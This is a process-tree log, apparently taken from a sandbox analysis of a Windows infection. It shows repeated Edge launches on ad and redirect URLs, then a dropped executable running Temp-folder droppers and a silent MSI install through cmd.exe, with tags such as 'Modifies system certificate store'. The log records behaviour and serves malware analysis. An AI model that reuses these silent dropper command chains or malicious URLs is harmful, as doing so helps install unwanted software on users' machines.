C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xf0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive12⤵
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 24013⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exeC:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654"12⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635489676 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exeC:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe12⤵
-
